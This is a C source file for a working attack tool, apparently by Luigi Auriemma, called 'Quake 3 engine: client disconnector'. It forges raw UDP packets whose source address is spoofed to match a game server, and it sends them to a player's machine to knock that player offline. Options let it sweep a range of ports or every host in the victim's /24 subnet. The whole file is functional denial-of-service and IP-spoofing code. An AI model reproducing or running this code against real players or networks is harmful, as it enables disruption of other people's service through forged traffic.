/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include "winerr.h"

    struct iphdr {
        uint32_t    ihl:4;
        uint32_t    version:4;
        uint8_t     tos;
        uint16_t    tot_len;
        uint16_t    id;
        uint16_t    frag_off;
        uint8_t     ttl;
        uint8_t     protocol;
        uint16_t    check;
        uint32_t    saddr;
        uint32_t    daddr;
    };
    struct udphdr {
        uint16_t    source;
        uint16_t    dest;
        uint16_t    len;
        uint16_t    check;
    };

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/udp.h>
    #include <netdb.h>
#endif



#define VER         "0.2"
#define PORT        27960
#define PCK         "\xff\xff\xff\x7f"



int send_pck(uint32_t sip, uint16_t sport, uint32_t dip, uint16_t dport);
uint16_t cksum(void *data, int len);
u_int resolv(char *host);
void std_err(void);




int main(int argc, char *argv[]) {
    uint32_t    server,
                client;
    u_int       broad  = 0;
    int         i,
                j;
    uint16_t    sport = PORT,
                cport = PORT;
    u_short     cportx = 0;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n" \
        "Quake 3 engine: client disconnector "VER"\n" \
        "by Luigi Auriemma\n" \
        "e-mail: aluigi@autistici.org\n" \
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <Q3_server> <Q3_client>\n"
            "\n"
            "Options:\n"
            "-s PORT     specify the server port (default %hu)\n"
            "-c PORT     specify the client port (default %hu)\n"
            "-C NUM      specify the number of ports over the source port from which sending\n"
            "            packets, this helps a bit in case you don't know the client's port\n"
            "-b          disconnect all the clients in the C class of the client IP\n"
            "\n"
            "Note, the client will be sent directly from the server to the client\n"
            "\n", argv[0], sport, cport);
        exit(1);
    }

    argc -= 2;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 's': sport  = atoi(argv[++i]); break;
            case 'c': cport  = atoi(argv[++i]); break;
            case 'C': cportx = atoi(argv[++i]); break;
            case 'b': broad  = 1;               break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }

#ifndef WIN32
    if(getuid()) {
        printf("\nError: you must be root to use raw sockets, I try to continue\n\n");
    }
#endif

    server = resolv(argv[argc]);
    client = resolv(argv[argc + 1]);
    if(broad) {
        client &= inet_addr("255.255.255.0");
    }

    printf("- from %s:%hu\n",
        inet_ntoa(*(struct in_addr *)&server), sport);
    printf("- to   %s:%hu\n",
        inet_ntoa(*(struct in_addr *)&client), cport);

    for(;;) {
        for(j = 0; ; j++) {
            send_pck(
                server,
                htons(sport),
                client + (inet_addr("0.0.0.1") * broad),
                htons(cport + j));
            fputc('.', stdout);
#ifdef WIN32
            sleep(1);
#else
            usleep(1000);
#endif
            if(j >= cportx) break;
        }

        if(!broad || ((broad & 0xff) == 0xff)) break;
        broad++;
    }

    printf("\n- finished, the client should be disconnected\n\n");
    return(0);
}



int send_pck(uint32_t sip, uint16_t sport, uint32_t dip, uint16_t dport) {
    struct pseudohdr {
        uint32_t    saddr;
        uint32_t    daddr;
        uint8_t     zero;
        uint8_t     protocol;
        uint16_t    len;
    };
    struct  sockaddr_in peer;
    struct  iphdr       *ip;
    struct  udphdr      *udp;
    struct  pseudohdr   *pseudo;
    int     sd,
            len = 0,
            on  = 1;
    u_char  *buff,
            *data;

#define IPSZ        sizeof(struct iphdr)
#define UDPSZ       sizeof(struct udphdr)
#define PSEUDOSZ    sizeof(struct pseudohdr)
#define PCKSIZE     (IPSZ + UDPSZ + len)
#define PSSIZE      (PSEUDOSZ + UDPSZ + len)

    len = sizeof(PCK) - 1;

    buff = malloc(PCKSIZE);
    if(!buff) std_err();

    peer.sin_addr.s_addr = dip;
    peer.sin_port        = dport;
    peer.sin_family      = AF_INET;

    ip     = (struct iphdr *)buff;
    udp    = (struct udphdr *)(buff + IPSZ);
    data   = (u_char *)(buff + IPSZ + UDPSZ);
    pseudo = (struct pseudohdr *)(buff + IPSZ - PSEUDOSZ);

    memcpy(data, PCK, len);

    pseudo->saddr    = sip;
    pseudo->daddr    = dip;
    pseudo->zero     = 0;
    pseudo->protocol = IPPROTO_UDP;
    pseudo->len      = htons(UDPSZ + len);

    udp->source      = sport;
    udp->dest        = dport;
    udp->check       = 0;
    udp->len         = pseudo->len;
    udp->check       = htons(cksum(pseudo, PSSIZE));

    ip->ihl          = 5;
    ip->version      = 4;
    ip->tos          = 0x10;
    ip->tot_len      = htons(PCKSIZE);
    ip->id           = htons(1);
    ip->frag_off     = htons(0);
    ip->ttl          = 128;
    ip->protocol     = IPPROTO_UDP;
    ip->check        = 0;
    ip->saddr        = sip;
    ip->daddr        = dip;
    ip->check        = htons(cksum(ip, IPSZ));

    sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if(sd < 0) std_err();
    if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (void *)&on, sizeof(on))
      < 0) std_err();
    if(sendto(sd, buff, PCKSIZE, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    close(sd);

    free(buff);
    return(0);

#undef IPSZ
#undef UDPSZ
#undef PSEUDOSZ
#undef PCKSIZE
#undef PSSIZE
}



uint16_t cksum(void *data, int len) {
    uint32_t    sum    = 0;
    int         i      = len >> 1,
                endian = 1; // big endian
    uint16_t    crc,
                *p     = (uint16_t *)data;

    if(*(char *)&endian) endian = 0;
    while(i--) sum += *p++;
    if(len & 1) sum += *p & (endian ? 0xff00 : 0xff);
    crc = sum = (sum >> 16) + (sum & 0xffff);
    if(sum >>= 16) crc += sum;
    if(!endian) crc = (crc >> 8) | (crc << 8);
    return(~crc);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }

    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



